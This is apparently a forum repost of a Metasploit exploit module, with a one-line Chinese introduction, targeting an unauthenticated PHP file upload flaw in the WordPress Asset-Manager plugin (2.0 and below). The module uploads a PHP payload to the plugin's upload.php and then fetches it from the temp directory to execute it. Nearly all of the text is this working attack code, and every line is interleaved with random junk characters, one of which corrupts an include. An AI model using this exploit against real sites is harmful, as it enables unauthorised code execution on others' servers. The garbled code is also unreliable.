这个模块利用 Metasploit 漏洞库中的一个漏洞：该漏洞存在于 WordPress 的 Asset-Manager 插件 2.0 及以下版本。该插件允许上传 PHP 文件，用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
/ W1 t3 {1 ]% C0 ]' U( w n
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
! H' y2 B p6 W7 T1 |$ B
require 'msf/core'
+ Z2 V% v0 y( Y" k7 S7 d# hrequire 'msf/core/exploit/php_exe'
) C. g8 M( W- ^: N3 l/ F
5 f2 o% X. [5 _) `/ m5 B0 |4 y& ~class Metasploit3 < Msf::Exploit::Remote/ b l: W8 u: V0 f- D7 u
Rank = ExcellentRanking" r3 [; u% d- ^2 p3 A2 U& I$ g
/ K4 {9 i9 F- w" K: w' X9 R
include Msf::Exploit::Remote::HttpClient
& f9 G. c5 f% e include Msf::Exploit:hpEXE
/ {: k! B& e6 ^9 n) n+ ~% C2 k9 e: U! M & r i3 f, t1 ]# w( L1 B& l
def initialize(info = {})
! \9 N6 R9 [) q" t6 ^) H7 @ super(update_info(info,
4 T& z. A* Y+ `8 @ 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',0 R; S8 b/ v3 k( \
'Description' => %q{2 b: E5 w! u0 ], q2 {* F8 [
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
: a- c* h1 t( w: c/ f0 `9 C plugin. By abusing the upload.php file, a malicious user can upload a file to a
/ |( _" m/ j0 z+ N1 C/ O7 Z temp directory without authentication, which results in arbitrary code execution.
- p/ _7 G2 g8 k7 _# B5 z. r },$ [$ E3 U$ Q8 p* x- Q( Z3 f
'Author' =>
, J. o8 R" q% H$ N; V: E9 e [7 v$ A) z( s- W5 a0 s) i' J, f
'Sammy FORGIT', # initial discovery
2 ?7 e) Q+ r7 S% W* \# _/ t 'James Fitts <fitts.james[at]gmail.com>' # metasploit module: V6 `" c: C$ o3 F
],! X& e& ~ a& \: Q8 m: v3 u! F
'License' => MSF_LICENSE,4 {! L* v/ D: _. ]2 C5 |! v
'References' =>
I+ k5 R1 f4 R( S& u [- u1 `: ?8 _% C
[ 'OSVDB', '82653' ],1 ?# G& K1 H, A" m
[ 'BID', '53809' ],( B7 @/ l/ w8 j6 D
[ 'EDB', '18993' ],6 B- Q) ]! n: W) e' k
[ 'URL', 'http:// www.myhack58.com /' ]
2 r( q; o, ~8 }2 i+ ?& s ],
* v8 ]* ?6 I0 @ 'Payload' =>
2 ]/ O- d; _- h {7 I$ |' q5 C- o, t8 b
'BadChars' => "\x00",- [+ f4 U4 ^6 F* L
},
1 N, F' [2 m' e5 j$ F" n2 ?( I& s, n* W2 s 'Platform' => 'php',
: a8 f) x8 c3 k' ? 'Arch' => ARCH_PHP,
; U, G1 C9 C5 W9 [ 'Targets' =>
1 k. R/ W! {+ b# L [
5 O: `# ]( g8 c7 j. _) u( D: k [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
5 o' r2 A+ {- F0 R [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 v) H8 T. I) N5 I% E
],: R, {, |. j, H7 \7 f4 s
'DefaultTarget' => 0,
) S& |- }9 ]8 w! S" D 'DisclosureDate' => 'May 26 2012'))6 P/ ]1 n, M+ u
& }4 H/ P1 E1 i, a: G; e
register_options(* q- @; W* z, h4 |6 N( e9 T3 u
[
2 }& Z! K% J# n OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" n# n. @6 m( l7 l ], self.class)
* N3 }1 ]0 c" S2 B9 S end/ Z( O0 `* F* Q' Y" }1 z. E
5 E9 T# c& C3 A# X# G3 @* I9 }, o/ N
def exploit& Z+ {: ^, w, e' }$ V
uri = target_uri.path
+ B) H: B+ i# R uri << '/' if uri[-1,1] != '/'
7 E7 [" ?7 Q# e peer = "#{rhost}:#{rport}"/ f% s) K. f5 W1 t4 T
payload_name = "#{rand_text_alpha(5)}.php"" m- c& j" k Q( L% M; {3 t# v3 r/ I3 c( y
php_payload = get_write_exec_payload(:unlink_self=>true)" ^, P: M2 X4 [5 {
1 g- m5 t. S4 e" h& E) g5 M
data = Rex::MIME::Message.new. Z! W- j {9 Y5 {8 N$ Z
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
8 p( D( ]# ?/ k$ ^" h post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' Y* x0 |5 \! M7 K6 v, }
9 n% X4 ]" V. A+ t( \ print_status("#{peer} - Uploading payload #{payload_name}")# t0 U1 L' j# q
res = send_request_cgi({/ f9 a$ M, c/ w7 X
'method' => 'POST',
' g7 j, ~' c) o! p a 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ l5 t5 a3 U9 `9 G K( c- F 'ctype' => "multipart/form-data; boundary=#{data.bound}",
4 d9 g$ ]3 l2 _8 x( T 'data' => post_data
' E B: [* M6 y })# R2 k; x- X+ U ^; ~
1 ^! u( x O& e) d! _* a- {1 t
if not res or res.code != 200 or res.body !~ /#{payload_name}/( ^* l: ?7 p3 i7 d4 i M9 d) w0 L
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; z0 B! W. d4 o( L# Send
1 p: N( t8 X* F, R; f3 k
9 a% i$ t- W- |' G1 e# u print_status("#{peer} - Executing payload #{payload_name}")
; v( A! A( Z. I& B res = send_request_raw({
3 T; J0 y w* t" E9 r 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",7 _" g# [2 x* s2 K
'method' => 'GET' C: L9 `, a" N+ b8 c9 c5 y" J
})
) y* `; e( g4 U* |, y+ x# n J* Q: @. h4 ?8 V* g$ L- S& `" U
if res and res.code != 200
( G% Q2 A# f, b. V fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 ?4 i) q: K4 q- \" C* O end
& i5 N5 |- Q- n2 ?0 j end
0 j: L, q& R+ R- J' q( Iend* N6 O6 Z& Z# l- b7 i" Z
|